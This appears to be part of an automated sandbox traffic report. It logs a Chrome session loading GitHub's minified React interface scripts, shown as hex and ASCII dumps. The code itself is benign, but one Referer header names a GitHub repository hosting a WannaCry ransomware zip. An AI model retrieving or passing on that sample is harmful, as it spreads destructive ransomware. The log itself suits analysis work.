                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 7d 7d 7d 26 5b 64 61 74 61 2d 6f 6d 69 74 2d 73 70 61 63 65 72 3d 27 74 72 75 65 27 5d 20 2e 50 52 49 56 41 54 45 5f 54 72 65 65 56 69 65 77 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 30 20 30 20 31 66 72 3b 7d 2e 50 52 49 56 41 54 45 5f 54 72 65 65 56 69 65 77 2d 69 74 65 6d 5b 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 27 74 72 75 65 27 5d 20 3e 20 2e 50 52 49 56 41 54 45 5f 54 72 65 65 56 69 65 77 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 22 2c 22 3b 26 3a 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 70 6f
                                                                                      Data Ascii: ia (forced-colors:active){outline:none;}}}&[data-omit-spacer='true'] .PRIVATE_TreeView-item-container{grid-template-columns:0 0 1fr;}.PRIVATE_TreeView-item[aria-current='true'] > .PRIVATE_TreeView-item-container{background-color:",";&::after{content:'';po
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 68 65 69 67 68 74 3a 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 3b 7d 22 2c 22 22 5d 2c 28 30 2c 64 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 61 63 63 65 6e 74 2e 66 67 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 66 6f 6e 74 53 69 7a 65 73 2e 31 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 66 67 2e 64 65 66 61 75 6c 74 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 72 61 64 69 69 2e 32 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e
                                                                                      Data Ascii: sition:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);white-space:nowrap;border-width:0;}",""],(0,d.U2)("colors.accent.fg"),(0,d.U2)("fontSizes.1"),(0,d.U2)("colors.fg.default"),(0,d.U2)("radii.2"),(0,d.U2)("colors.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 69 66 28 22 74 72 65 65 69 74 65 6d 22 21 3d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 6c 65 6d 65 6e 74 20 69 73 20 6e 6f 74 20 61 20 74 72 65 65 69 74 65 6d 22 29 3b 73 77 69 74 63 68 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 29 29 7b 63 61 73 65 22 74 72 75 65 22 3a 72 65 74 75 72 6e 22 6f 70 65 6e 22 3b 63 61 73 65 22 66 61 6c 73 65 22 3a 72 65 74 75 72 6e 22 63 6c 6f 73 65 64 22 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 65 6e 64 22 7d 7d 28 65 29 3b 73 77 69 74 63 68 28 60 24 7b 72 7d 20 24 7b 74 2e 6b 65 79 7d 60 29 7b 63 61 73 65 22 6f 70 65 6e 20 41 72 72 6f 77 52 69 67 68 74 22 3a 72 65 74 75 72
                                                                                      Data Ascii: tion(e){if("treeitem"!==e.getAttribute("role"))throw Error("Element is not a treeitem");switch(e.getAttribute("aria-expanded")){case"true":return"open";case"false":return"closed";default:return"end"}}(e);switch(`${r} ${t.key}`){case"open ArrowRight":retur
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 27 29 3b 69 66 28 21 74 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 72 6f 6c 65 3d 22 74 72 65 65 69 74 65 6d 22 5d 27 29 29 3b 69 66 28 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 72 5b 30 5d 2e 66 69 72 73 74 45 6c 65 6d 65 6e 74 43 68 69 6c 64 2c 6c 3d 41 28 74 2c 6e 29 2c 69 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2e 69 6e 64 65 78 4f 66 28 65 29 2f 6c 29 2c 6f 3d 72 2e 69 6e 64 65 78 4f 66 28 65 29 2d 6c 2a 69 3b 72 65 74 75 72 6e 20 72 5b 4d 61 74 68 2e 6d 69 6e 28 72 2e 6c 65 6e 67 74 68 2d 31 2c 28 69 2b 31 29 2a 6c 2b 6f 29 5d 7d 28 65 29 7d 7d 28 74 2c 72 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 74 7d 7d 2c 66
                                                                                      Data Ascii: ');if(!t)return;let r=Array.from(t.querySelectorAll('[role="treeitem"]'));if(0===r.length)return;let n=r[0].firstElementChild,l=A(t,n),i=Math.floor(r.indexOf(e)/l),o=r.indexOf(e)-l*i;return r[Math.min(r.length-1,(i+1)*l+o)]}(e)}}(t,r))&&void 0!==n?n:t}},f
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6e 74 29 2c 6e 2e 63 75 72 72 65 6e 74 3d 6f 28 28 29 3d 3e 72 2e 63 75 72 72 65 6e 74 3d 22 22 2c 33 30 30 29 2c 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 29 7d 72 65 74 75 72 6e 20 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 6c 29 2c 28 29 3d 3e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 6c 29 7d 2c 5b 65 2c 63 2c 61 2c 6f 5d 29 7d 28 7b 63 6f 6e 74 61 69 6e 65 72 52 65 66 3a 6c 2c 6f 6e 46 6f 63 75 73 43 68 61 6e 67 65 3a 65 3d 3e 7b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 65 2e 66 6f 63 75 73 28 29 7d 7d 29 3b 6c 65 74 20 6d 3d 69 2e 75 73 65 52
                                                                                      Data Ascii: nt),n.current=o(()=>r.current="",300),e.preventDefault(),e.stopPropagation()))}return t.addEventListener("keydown",l),()=>t.removeEventListener("keydown",l)},[e,c,a,o])}({containerRef:l,onFocusChange:e=>{e instanceof HTMLElement&&e.focus()}});let m=i.useR
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 2c 6e 2c 6c 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 74 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 3d 28 6c 3d 76 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 67 65 74 28 65 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 6f 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 72 7d 2c 76 61 6c 75 65 3a 61 2c 6f 6e 43 68 61 6e 67 65 3a 63 7d 29 2c 7b 6c 65 76 65 6c 3a 56 7d 3d 69 2e 75 73 65 43 6f 6e 74 65 78 74 28 49 29 2c 7b 68 61 73 53 75 62 54 72 65 65 3a 62 2c 73 75 62 54 72 65 65 3a 41 2c 63 68 69 6c 64 72 65 6e 57 69 74 68 6f 75 74 53 75 62 54 72 65 65 3a 52 7d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 7b 6c 65 74 20 74 3d 69 2e
                                                                                      Data Ascii: ,n,l;return null!==(t=null!==(n=null===(l=v.current)||void 0===l?void 0:l.get(e))&&void 0!==n?n:o)&&void 0!==t?t:r},value:a,onChange:c}),{level:V}=i.useContext(I),{hasSubTree:b,subTree:A,childrenWithoutSubTree:R}=function(e){return i.useMemo(()=>{let t=i.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6c 6c 3d 3d 3d 28 74 3d 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2e 66 69 72 73 74 45 6c 65 6d 65 6e 74 43 68 69 6c 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 28 7b 62 6c 6f 63 6b 3a 22 6e 65 61 72 65 73 74 22 2c 69 6e 6c 69 6e 65 3a 22 6e 65 61 72 65 73 74 22 7d 29 2c 4e 28 21 30 29 2c 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 7d 2c 6f 6e 42 6c 75 72 3a 28 29 3d 3e 4e 28 21 31 29 2c 6f 6e 43 6c 69 63 6b 3a 65 3d 3e 7b 73 3f 73 28 65 29 3a 48 28 65 29 2c 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 7d 2c 6f 6e 41 75 78 43 6c 69 63 6b 3a 65 3d 3e 7b 73 26 26 31 3d 3d 3d 65 2e 62 75 74 74 6f 6e 26 26 73 28 65 29 2c 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 7d
                                                                                      Data Ascii: ll===(t=e.currentTarget.firstElementChild)||void 0===t||t.scrollIntoView({block:"nearest",inline:"nearest"}),N(!0),e.stopPropagation()},onBlur:()=>N(!1),onClick:e=>{s?s(e):H(e),e.stopPropagation()},onAuxClick:e=>{s&&1===e.button&&s(e),e.stopPropagation()}
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 73 65 52 65 66 28 6e 75 6c 6c 29 2c 75 3d 69 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 5b 64 2c 6d 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 69 2e 75 73 65 52 65 66 28 65 29 3b 72 65 74 75 72 6e 20 69 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 74 2e 63 75 72 72 65 6e 74 3d 65 7d 2c 5b 65 5d 29 2c 74 2e 63 75 72 72 65 6e 74 7d 28 74 29 2c 7b 73 61 66 65 53 65 74 54 69 6d 65 6f 75 74 3a 70 7d 3d 28 30 2c 66 2e 5a 29 28 29 3b 72 65 74 75 72 6e 28 69 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 28 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 22 64 6f 6e 65 22 3d 3d 3d 74 29 26 26 28 61 7c 7c 72 3f 61 26 26 72 26 26 63 28 21 31 29 3a 63 28 21 30 29 29 7d 2c 5b 74 2c 61 2c 63 2c 72 5d 29 2c 69
                                                                                      Data Ascii: seRef(null),u=i.useRef(null),[d,m]=i.useState(!1),g=function(e){let t=i.useRef(e);return i.useEffect(()=>{t.current=e},[e]),t.current}(t),{safeSetTimeout:p}=(0,f.Z)();return(i.useEffect(()=>{(void 0===t||"done"===t)&&(a||r?a&&r&&c(!1):c(!0))},[t,a,c,r]),i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      60192.168.2.1649764185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC736OUTGET /assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-4e97c6-949a0431d8c0.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 15313
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 21 Mar 2024 19:18:34 GMT
                                                                                      ETag: 0x8DC49DBB3AC1278
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 75595
                                                                                      X-Served-By: cache-iad-kcgs7200058-IAD, cache-ewr18120-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 44, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: c4e028ae5d2c3e82b196e391f24dd5845c935257
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 41 76 61 74 61 72 5f 41 76 61 74 61 72 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 2d 34 65 39 37 63 36 22 5d 2c 7b 32 36 30 31 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 62 2c 65 3a 28 29 3d 3e 67 7d 29 3b 76 61 72 20 6e 3d 72 28 36 37 32 39 34 29 2c 6f 3d 72 28 31 35 33 38 38 29 2c 6c 3d 72 28 34 32 33 37 39
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-4e97c6"],{26012:(e,t,r)=>{r.d(t,{Z:()=>b,e:()=>g});var n=r(67294),o=r(15388),l=r(42379
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6c 65 74 20 69 3d 28 30 2c 6e 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 61 73 3a 74 3d 22 61 22 2c 73 78 3a 72 3d 6c 2e 50 2c 2e 2e 2e 69 7d 2c 73 29 3d 3e 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2e 58 2c 61 28 7b 61 73 3a 74 2c 72 65 66
                                                                                      Data Ascii: ){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}let i=(0,n.forwardRef)(({children:e,as:t="a",sx:r=l.P,...i},s)=>n.createElement(o.X,a({as:t,ref
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 28 29 3d 3e 70 7d 29 3b 76 61 72 20 6e 3d 72 28 36 37 32 39 34 29 2c 6f 3d 72 28 31 35 33 38 38 29 2c 6c 3d 72 28 32 37 39 39 39 29 2c 61 3d 72 28 34 32 33 37 39 29 2c 69 3d 72 28 31 35 31 37 33 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 28 73 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d
                                                                                      Data Ascii: ()=>p});var n=r(67294),o=r(15388),l=r(27999),a=r(42379),i=r(15173);function s(){return(s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 37 39 39 39 29 2c 61 3d 72 28 34 32 33 37 39 29 2c 69 3d 72 28 31 35 31 37 33 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 28 73 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d
                                                                                      Data Ascii: 7999),a=r(42379),i=r(15173);function s(){return(s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 28 64 2c 73 28 7b 61 73 3a 65 2c 73 69 7a 65 3a 74 2c 76 61 72 69 61 6e 74 3a 72 2c 72 65 66 3a 6c 7d 2c 6f 29 29 7d 29 7d 2c 39 31 38 36 33 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 67 7d 29 3b 76 61 72 20 6e 2c 6f 2c 6c 3d 72 28 36 38 38 39 37 29 2c 61 3d 72 28 36 37 32 39 34 29 2c 69 3d 72 28 31 35 33 38 38 29 3b 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 2a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 42 53 44 2d 33 2d 43 6c 61 75 73 65 0a 20 2a 2f 6c 65 74 20 73 3d 6e 65 77 20 53 65 74 28 5b 22 63 68 69 6c 64 72 65 6e 22 2c 22 6c 6f 63 61 6c 4e 61 6d 65 22 2c 22 72 65 66 22 2c 22 73 74 79 6c 65
                                                                                      Data Ascii: (d,s({as:e,size:t,variant:r,ref:l},o))})},91863:(e,t,r)=>{r.d(t,{Z:()=>g});var n,o,l=r(68897),a=r(67294),i=r(15388);/** * @license * Copyright 2018 Google LLC * SPDX-License-Identifier: BSD-3-Clause */let s=new Set(["children","localName","ref","style
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 7d 3b 66 6f 72 28 6c 65 74 5b 65 2c 6e 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 29 73 2e 68 61 73 28 65 29 3f 72 5b 22 63 6c 61 73 73 4e 61 6d 65 22 3d 3d 3d 65 3f 22 63 6c 61 73 73 22 3a 65 5d 3d 6e 3a 67 2e 68 61 73 28 65 29 7c 7c 65 20 69 6e 20 69 2e 70 72 6f 74 6f 74 79 70 65 3f 74 68 69 73 2e 69 5b 65 5d 3d 6e 3a 72 5b 65 5d 3d 6e 3b 72 65 74 75 72 6e 20 72 2e 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 3d 21 30 2c 75 28 61 2c 72 29 7d 7d 3b 76 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 6e 75 6c 6c 21 3d 6f 3f 6f 3a 69 2e 6e 61 6d 65 3b 6c 65 74 20 6d 3d 6c 2e 66 6f 72 77 61 72 64 52 65 66 28 28 65 2c 74 29 3d 3e 75 28 76 2c 7b 2e 2e 2e 65 2c 5f 24 47 6c 3a 74 7d 2c 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20
                                                                                      Data Ascii: };for(let[e,n]of Object.entries(t))s.has(e)?r["className"===e?"class":e]=n:g.has(e)||e in i.prototype?this.i[e]=n:r[e]=n;return r.suppressHydrationWarning=!0,u(a,r)}};v.displayName=null!=o?o:i.name;let m=l.forwardRef((e,t)=>u(v,{...e,_$Gl:t},null==e?void
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6f 6c 2d 63 6f 6e 74 65 6e 74 22 3a 7b 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 6e 75 6c 6c 21 3d 65 26 26 65 2e 73 65 6c 65 63 74 65 64 3f 22 73 65 67 6d 65 6e 74 65 64 43 6f 6e 74 72 6f 6c 2e 62 75 74 74 6f 6e 2e 62 67 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 6e 75 6c 6c 21 3d 65 26 26 65 2e 73 65 6c 65 63 74 65 64 3f 22 73 65 67 6d 65 6e 74 65 64 43 6f 6e 74 72 6f 6c 2e 62 75 74 74 6f 6e 2e 73 65 6c 65 63 74 65 64 2e 62 6f 72 64 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 62 6f 72 64 65 72 53 74 79 6c 65 3a 22 73 6f 6c 69 64 22 2c 62 6f 72 64 65 72 57 69 64 74 68 3a 31 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 6e 75 6c 6c 21 3d 65 26
                                                                                      Data Ascii: ol-content":{alignItems:"center",backgroundColor:null!=e&&e.selected?"segmentedControl.button.bg":"transparent",borderColor:null!=e&&e.selected?"segmentedControl.button.selected.border":"transparent",borderStyle:"solid",borderWidth:1,borderRadius:null!=e&
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 3a 22 61 62 73 6f 6c 75 74 65 22 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 30 2c 74 72 61 6e 73 66 6f 72 6d 3a 22 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 22 2c 74 6f 70 3a 22 35 30 25 22 2c 6d 69 6e 48 65 69 67 68 74 3a 22 34 34 70 78 22 7d 7d 7d 29 2c 70 3d 28 29 3d 3e 28 7b 64 69 73 70 6c 61 79 3a 22 62 6c 6f 63 6b 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 2c 66 6c 65 78 47 72 6f 77 3a 31 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 2d 31 70 78 22 2c 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 3a 22 2d 31 70 78 22 2c 22 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 22 3a 64 2c 22 3a 66 6f 63 75 73 2d 77 69 74 68 69 6e 3a 68 61 73 28 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 29 22 3a 7b 22 2d 2d 73 65 70 61 72 61 74 6f 72 2d 63 6f 6c 6f
                                                                                      Data Ascii: :"absolute",left:0,right:0,transform:"translateY(-50%)",top:"50%",minHeight:"44px"}}}),p=()=>({display:"block",position:"relative",flexGrow:1,marginTop:"-1px",marginBottom:"-1px",":not(:last-child)":d,":focus-within:has(:focus-visible)":{"--separator-colo
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 75 74 74 6f 6e 5f 5f 53 65 67 6d 65 6e 74 65 64 43 6f 6e 74 72 6f 6c 49 63 6f 6e 42 75 74 74 6f 6e 53 74 79 6c 65 64 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 6f 78 68 36 61 39 2d 30 22 7d 29 28 5b 22 22 2c 22 3b 22 5d 2c 61 2e 5a 29 2c 77 3d 28 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 65 2c 69 63 6f 6e 3a 74 2c 73 65 6c 65 63 74 65 64 3a 72 2c 73 78 3a 6f 3d 75 2e 50 2c 2e 2e 2e 61 7d 29 3d 3e 7b 6c 65 74 20 69 3d 6d 28 29 28 7b 77 69 64 74 68 3a 22 33 32 70 78 22 2c 2e 2e 2e 70 28 29 7d 2c 6f 29 3b 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 5a 2c 7b 61 73 3a 22 6c 69 22 2c 73 78 3a 69 7d 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 43 2c 79 28 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 65 2c 22 61 72 69
                                                                                      Data Ascii: utton__SegmentedControlIconButtonStyled",componentId:"sc-oxh6a9-0"})(["",";"],a.Z),w=({"aria-label":e,icon:t,selected:r,sx:o=u.P,...a})=>{let i=m()({width:"32px",...p()},o);return n.createElement(l.Z,{as:"li",sx:i},n.createElement(C,y({"aria-label":e,"ari
